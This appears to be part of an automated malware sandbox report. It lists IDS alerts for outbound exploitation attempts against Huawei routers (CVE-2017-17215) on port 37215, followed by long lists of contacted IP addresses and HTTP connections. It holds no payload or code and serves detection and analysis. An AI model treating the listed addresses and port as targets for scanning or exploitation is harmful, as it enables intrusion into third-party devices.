                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56850 -> 41.109.187.107:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56850 -> 41.109.187.107:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53144 -> 157.107.162.53:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53144 -> 157.107.162.53:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58142 -> 157.124.43.107:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58142 -> 157.124.43.107:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34728 -> 41.144.102.136:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34728 -> 41.144.102.136:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33964 -> 157.74.64.134:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33964 -> 157.74.64.134:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59308 -> 41.207.94.39:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59308 -> 41.207.94.39:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58622 -> 197.202.24.221:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58622 -> 197.202.24.221:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39082 -> 157.53.146.11:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39082 -> 157.53.146.11:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49670 -> 41.172.189.79:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49670 -> 41.172.189.79:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43204 -> 123.131.134.210:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43204 -> 123.131.134.210:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59990 -> 41.85.36.131:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59990 -> 41.85.36.131:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34286 -> 41.254.114.42:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34286 -> 41.254.114.42:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55676 -> 157.247.11.168:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55676 -> 157.247.11.168:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39272 -> 41.9.195.101:37215
                  Source: global trafficTCP traffic: 74.101.176.184 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.149.109.197 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 90.7.62.50 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 186.184.213.120 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 195.170.1.247 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.5.82.148 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 221.191.119.202 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.102.180.139 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.180.19.148 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.144.214.203 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 135.145.13.232 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 43.55.160.180 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.22.72.60 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.45.3.44 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.29.115.65 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.117.164.47 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 130.62.248.59 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 5.144.117.21 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.135.80.174 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.227.245.236 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.152.230.54 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.28.174.126 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.1.113.95 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.30.137.212 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.16.184.209 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.3.233.57 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.94.171.151 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 174.114.227.250 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.212.175.192 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 206.104.18.133 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.144.237.122 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.60.86.29 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 219.72.118.94 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.160.52.78 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.160.40.71 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.51.85.78 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.18.59.22 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 96.209.118.195 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.202.196.183 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.45.163.77 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.21.90.246 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.192.67.145 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 111.12.69.255 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.159.156.241 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.64.69.227 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.101.215.139 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 57.42.140.234 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.175.114.73 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.206.168.234 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.185.35.87 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.225.238.55 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 145.170.85.227 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 131.113.70.225 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.211.47.10 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 171.128.195.137 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.233.213.23 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.255.37.5 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 139.13.35.184 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 132.170.141.1 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.202.85.97 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.99.215.32 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.29.9.130 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.8.45.235 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.254.159.206 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 101.129.97.51 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.10.89.64 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 185.164.141.71 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.195.22.236 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.28.70.64 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 86.154.79.29 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.155.92.145 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.207.152.192 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.252.143.198 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 32.202.29.246 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.98.197.150 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.19.87.80 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 195.37.174.200 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 177.47.141.82 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.203.62.242 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.102.74.35 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.23.163.14 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 203.251.133.172 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.170.150.68 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.41.180.116 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 95.129.116.158 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 46.209.16.230 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.26.3.225 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.118.62.90 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.158.255.222 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 124.241.189.58 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.65.39.223 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 77.76.169.184 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.104.233.39 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.251.154.46 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.252.253.87 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.250.95.47 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.57.176.135 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.233.44.35 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 221.104.140.125 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.192.197.140 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.225.60.127 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.89.167.115 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.29.80.97 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.154.255.174 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.176.51.125 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.95.25.90 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 125.39.64.172 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.255.193.204 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.227.252.63 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.54.19.143 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 46.225.21.207 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.211.212.8 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.174.73.168 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 46.221.220.195 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.215.252.74 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.174.151.32 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.60.100.141 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 150.44.188.59 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.68.28.54 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.147.145.189 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 208.150.203.118 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 152.57.176.37 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.192.152.68 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.238.249.245 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.205.9.247 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 66.8.227.125 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.52.41.106 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.88.81.225 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 89.92.141.49 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.223.150.229 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 81.152.255.200 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 153.104.213.89 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 163.137.150.13 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 73.111.130.134 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 122.166.54.208 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.223.176.239 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.186.174.45 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 87.230.214.90 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.11.143.75 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.68.57.166 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.52.65.140 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.230.47.191 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.212.168.33 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.2.240.85 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.135.92.102 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.190.231.229 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 53.9.34.11 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.196.126.1 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 185.174.105.50 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.48.229.175 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.241.125.74 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.214.68.20 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.130.72.223 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 14.126.26.250 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.203.156.249 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.37.236.98 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 173.121.75.210 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.207.251.197 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.215.53.253 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 193.130.43.8 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.83.244.91 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 24.171.242.11 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.4.186.141 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.198.16.171 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 25.174.195.250 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.25.76.89 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.72.125.10 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 164.106.102.194 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.204.232.11 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.235.118.49 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.52.106.126 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.152.213.148 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.243.201.47 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.158.61.103 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.181.35.159 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.183.59.240 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.23.38.169 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.134.93.225 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.77.24.89 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.174.69.222 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 37.145.73.193 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.124.97.184 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 123.136.248.253 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 146.243.107.252 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.71.63.179 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 125.79.62.244 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.209.178.18 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.54.151.14 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 90.185.86.151 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.12.119.99 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.178.199.181 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.242.248.238 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.36.60.196 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.80.154.10 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.197.151.231 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.211.79.230 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.202.16.206 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.110.49.48 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.189.126.251 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 169.11.165.80 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.235.93.64 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 17.179.142.78 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.195.201.212 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.122.12.150 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 158.13.46.18 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.175.199.189 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.140.67.38 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.107.22.161 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.119.94.143 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.119.190.155 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.115.148.8 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.18.47.98 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.5.249.164 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.57.46.186 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.5.103.111 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.116.96.172 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.118.12.121 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.144.158.209 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 17.164.25.82 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.149.98.103 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.15.8.197 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.72.66.3 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 131.142.45.223 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.52.181.205 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.236.232.103 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.125.52.233 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.144.212.156 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.212.90.236 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.50.56.249 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.76.109.70 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.132.201.193 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 2.247.127.226 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.47.32.31 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.174.164.182 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.224.239.253 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.206.94.122 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.5.208.61 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.61.150.149 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 115.183.79.252 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.216.54.185 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 184.60.128.24 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.216.51.31 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.36.102.72 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.70.199.121 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.166.240.115 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.189.159.169 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.121.103.36 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.162.112.87 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 95.51.118.14 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.52.39.17 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 210.21.110.251 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.170.114.69 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 83.156.17.59 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 18.58.222.60 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 5.96.24.64 ports 1,2,3,5,7,37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52016 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38496 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33540 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51348 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55358 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43902 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39090 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60584 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42944 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46372 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48086 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56006 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55618 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34356 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46530 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57298 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51428 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36194 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38652 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40676 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49564 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60784 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57774 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41414 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34696 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60508 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36266 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34224 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49440 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42574 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43546 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46440 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54880 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46108 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45616 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54242 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35990 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53278 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60670 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36708 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48604 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40856 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38798 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57976 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52248 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57512 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51580 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57132 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52312 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37300 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37272 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45360 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36172 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45078 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42490 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51020 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54424 -> 37215
